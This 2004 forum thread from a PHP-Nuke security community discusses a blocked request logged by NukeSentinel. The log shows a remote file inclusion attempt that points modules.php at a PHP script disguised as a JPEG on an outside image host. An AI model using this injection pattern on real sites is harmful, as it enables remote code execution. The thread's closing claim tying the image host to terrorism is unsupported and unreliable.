No Obvious Match Filter

Client Joined: Apr 15, 2003 Posts: 466 Location: FL

Agent Inspector tells me there is not an obvious match for this, so thought I should post it here as requested.

Quote:

Date & Time: 2004-10-15 09:28:25
Blocked IP: 194.87.13.8
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: none
Query String: redwebz.org:80/modules.php?name=http://img91.exs.cx/img91/9747/test3.jpg?
Forwarded For: none
Client IP: none
Remote Address: 194.87.13.8
Remote Port: 50438
Request Method: GET

Posted: Fri Oct 15, 2004 12:58 pm

That is not an agent, someone was trying to run a remote script on your site.

Posted: Fri Oct 15, 2004 1:22 pm

Thanks for clarifyiing for me Chat...

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

I have gotten several of thos this morning also. NukeSentinel stopped them dead Smile

Posted: Fri Oct 15, 2004 2:15 pm

I had another also, both from RIPE. Sentinel stopped them in their tracks.

Posted: Mon Oct 18, 2004 7:24 am

I also meant to mention that when Sentinel blocked this, it gave filter as the reason...dunno if that means anything, but figured I would tell ya....

Posted: Mon Oct 18, 2004 7:25 am

It should. It 'filtered' the URL

Posted: Mon Oct 18, 2004 10:15 am

I reported the php file disguised as a JPEG to IMAGESHACK.US and here was their response:

Quote:

This was deleted.

And another thing: you can't launch attacks from .jpg files.

Says them! I had multiple attempts on different websites using a file hosted by IMAGESHACK.US.

I just tested to see if IMAGESHACK.US had implemented a fix to prevent the disguise of txt/php files as JPEG files, but I was able to upload a regular text file whose extension I had simply changed to .JPG. Theoretically, can IMAGESHACK.US patch their systems to prevent the upload of non-JPEG files with JPEG extensions? If not, expect possible future attacks facilitated by IMAGESHACK.US.

On a somewhat unrelated note, there are claims that IMAGESHACK.US is associated with terrorism.